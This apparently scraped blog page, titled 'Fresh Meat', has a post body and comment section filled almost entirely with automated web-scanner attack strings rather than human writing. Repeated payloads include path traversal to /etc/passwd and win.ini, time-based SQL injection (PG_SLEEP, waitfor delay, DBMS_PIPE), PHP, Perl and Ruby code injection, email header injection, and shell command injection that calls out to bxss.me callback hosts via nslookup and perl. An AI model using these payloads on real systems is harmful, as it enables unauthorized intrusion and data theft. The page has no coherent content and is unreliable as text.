Fresh Meat
555
../../../../../../../../../../../../../../etc/passwd
../555
‘”()
;(nslookup hitmuocuiepirbd1ba.bxss.me||perl -e “gethostbyname(‘hitmuocuiepirbd1ba.bxss.me’)”)|(nslookup hitmuocuiepirbd1ba.bxss.me||perl -e “gethostbyname(‘hitmuocuiepirbd1ba.bxss.me’)”)&(nslookup hitmuocuiepirbd1ba.bxss.me||perl -e “gethostbyname(‘hitmuocuiepirbd1ba.bxss.me’)”)
wp-comments-post.php
‘.print(md5(31337)).’
12345′”\’\”);|]*{ ”💡
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
http://bxss.me/t/fit.txt
bxss.me
‘+response.write(9314986*9489447)+’
&echo eirvhd$()\ dtekuq\nz^xyu||a #’ &echo eirvhd$()\ dtekuq\nz^xyu||a #|” &echo eirvhd$()\ dtekuq\nz^xyu||a #
;(nslookup hittdzkcnemvq98e62.bxss.me||perl -e “gethostbyname(‘hittdzkcnemvq98e62.bxss.me’)”)|(nslookup hittdzkcnemvq98e62.bxss.me||perl -e “gethostbyname(‘hittdzkcnemvq98e62.bxss.me’)”)&(nslookup hittdzkcnemvq98e62.bxss.me||perl -e “gethostbyname(‘hittdzkcnemvq98e62.bxss.me’)”)
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
${@print(md5(31337))}
1
‘+response.write(9252739*9225390)+’
|(nslookup hitaibefhllhf9edef.bxss.me||perl -e “gethostbyname(‘hitaibefhllhf9edef.bxss.me’)”)
/etc/passwd
/.././.././.././.././.././.././.././../etc/./passwd%00
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
WEB-INF/web.xml
-1 OR 2+620-620-1=0+0+0+1 —
-1′ OR 3+477-477-1=0+0+0+1 —
-1′ OR 2+488-488-1=0+0+0+1 or ‘4NKx4uY7’=’
1some_inexistent_file_with_long_name%00.jpg
-1); waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
X4OTRQ3g’ OR 985=(SELECT 985 FROM PG_SLEEP(15))–
1%2527%2522
1*555
-1 OR 2+584-584-1=0+0+0+1
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-1; waitfor delay ‘0:0:15’ —
W5Vif02S’; waitfor delay ‘0:0:15’ —
-5 OR 151=(SELECT 151 FROM PG_SLEEP(15))–
z2pjVX3e
‘+response.write(9546075*9660930)+’
./1
1%0abcc:[email protected]
-1)) OR 802=(SELECT 802 FROM PG_SLEEP(15))–
‘+’A’.concat(70-3).concat(22*4).concat(107).concat(80).concat(122).concat(86)+(require’socket’ Socket.gethostbyname(‘hitdj’+’vguhjvdj4af9b.bxss.me.’)[3].to_s)+’
‘.gethostbyname(lc(‘hitax’.’rdvindki9d7c1.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(102).chr(82).chr(112).chr(68).’
“;print(md5(31337));$a=”
hvkxacex’ OR 977=(SELECT 977 FROM PG_SLEEP(15))–
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
if(now()=sysdate(),sleep(15),0)
IzD18kHD’) OR 488=(SELECT 488 FROM PG_SLEEP(15))–
dTPObRe9′)) OR 362=(SELECT 362 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
2P4IoyV9′; waitfor delay ‘0:0:15’ —
-5 OR 164=(SELECT 164 FROM PG_SLEEP(15))–
-5) OR 139=(SELECT 139 FROM PG_SLEEP(15))–
OEz5YMBQ’; waitfor delay ‘0:0:15’ —
-1)) OR 458=(SELECT 458 FROM PG_SLEEP(15))–
-5 OR 292=(SELECT 292 FROM PG_SLEEP(15))–
PZPWD2fS’ OR 726=(SELECT 726 FROM PG_SLEEP(15))–
-5) OR 700=(SELECT 700 FROM PG_SLEEP(15))–
eBcYWvfg’) OR 38=(SELECT 38 FROM PG_SLEEP(15))–
-1)) OR 157=(SELECT 157 FROM PG_SLEEP(15))–
MmrMOozA’)) OR 242=(SELECT 242 FROM PG_SLEEP(15))–
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
Your email address will not be published. Required fields are marked *
Comment
Name
Email
Website
Δ
Comments (142)
555
555
555
../../../../../../../../../../../../../../etc/passwd
../555
555
555
555
‘”()
555
555
;(nslookup hitmuocuiepirbd1ba.bxss.me||perl -e “gethostbyname(‘hitmuocuiepirbd1ba.bxss.me’)”)|(nslookup hitmuocuiepirbd1ba.bxss.me||perl -e “gethostbyname(‘hitmuocuiepirbd1ba.bxss.me’)”)&(nslookup hitmuocuiepirbd1ba.bxss.me||perl -e “gethostbyname(‘hitmuocuiepirbd1ba.bxss.me’)”)
wp-comments-post.php
555
555
555
555
555
‘.print(md5(31337)).’
555
12345′”\’\”);|]*{
”💡
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
http://bxss.me/t/fit.txt
bxss.me
555
555
‘+response.write(9314986*9489447)+’
555
555
555
555
555
555
555
555
555
555
555
&echo eirvhd$()\ dtekuq\nz^xyu||a #’ &echo eirvhd$()\ dtekuq\nz^xyu||a #|” &echo eirvhd$()\ dtekuq\nz^xyu||a #
555
555
;(nslookup hittdzkcnemvq98e62.bxss.me||perl -e “gethostbyname(‘hittdzkcnemvq98e62.bxss.me’)”)|(nslookup hittdzkcnemvq98e62.bxss.me||perl -e “gethostbyname(‘hittdzkcnemvq98e62.bxss.me’)”)&(nslookup hittdzkcnemvq98e62.bxss.me||perl -e “gethostbyname(‘hittdzkcnemvq98e62.bxss.me’)”)
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
555
${@print(md5(31337))}
555
12345′”\’\”);|]*{
”💡
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
http://bxss.me/t/fit.txt
1
‘+response.write(9252739*9225390)+’
|(nslookup hitaibefhllhf9edef.bxss.me||perl -e “gethostbyname(‘hitaibefhllhf9edef.bxss.me’)”)
/etc/passwd
/.././.././.././.././.././.././.././../etc/./passwd%00
1
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
WEB-INF/web.xml
‘.print(md5(31337)).’
-1 OR 2+620-620-1=0+0+0+1 —
-1′ OR 3+477-477-1=0+0+0+1 —
-1′ OR 2+488-488-1=0+0+0+1 or ‘4NKx4uY7’=’
1some_inexistent_file_with_long_name%00.jpg
-1); waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
X4OTRQ3g’ OR 985=(SELECT 985 FROM PG_SLEEP(15))–
1%2527%2522
555
555
555
555
555
555
555
555
555
555
555
1*555
-1 OR 2+584-584-1=0+0+0+1
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-1; waitfor delay ‘0:0:15’ —
555
-1); waitfor delay ‘0:0:15’ —
555
555
1 waitfor delay ‘0:0:15’ —
W5Vif02S’; waitfor delay ‘0:0:15’ —
-5 OR 151=(SELECT 151 FROM PG_SLEEP(15))–
z2pjVX3e
1*555
‘+response.write(9546075*9660930)+’
1
./1
1
1
1%0abcc:[email protected]
1
-1)) OR 802=(SELECT 802 FROM PG_SLEEP(15))–
‘+’A’.concat(70-3).concat(22*4).concat(107).concat(80).concat(122).concat(86)+(require’socket’
Socket.gethostbyname(‘hitdj’+’vguhjvdj4af9b.bxss.me.’)[3].to_s)+’
‘.gethostbyname(lc(‘hitax’.’rdvindki9d7c1.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(102).chr(82).chr(112).chr(68).’
1
“;print(md5(31337));$a=”
1
1
hvkxacex’ OR 977=(SELECT 977 FROM PG_SLEEP(15))–
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
bxss.me
1
if(now()=sysdate(),sleep(15),0)
IzD18kHD’) OR 488=(SELECT 488 FROM PG_SLEEP(15))–
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
dTPObRe9′)) OR 362=(SELECT 362 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-1); waitfor delay ‘0:0:15’ —
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
1 waitfor delay ‘0:0:15’ —
2P4IoyV9′; waitfor delay ‘0:0:15’ —
-5 OR 164=(SELECT 164 FROM PG_SLEEP(15))–
-5) OR 139=(SELECT 139 FROM PG_SLEEP(15))–
OEz5YMBQ’; waitfor delay ‘0:0:15’ —
-1)) OR 458=(SELECT 458 FROM PG_SLEEP(15))–
-5 OR 292=(SELECT 292 FROM PG_SLEEP(15))–
PZPWD2fS’ OR 726=(SELECT 726 FROM PG_SLEEP(15))–
-5) OR 700=(SELECT 700 FROM PG_SLEEP(15))–
eBcYWvfg’) OR 38=(SELECT 38 FROM PG_SLEEP(15))–
-1)) OR 157=(SELECT 157 FROM PG_SLEEP(15))–
MmrMOozA’)) OR 242=(SELECT 242 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
1
1
1
1
1
1
1
1
1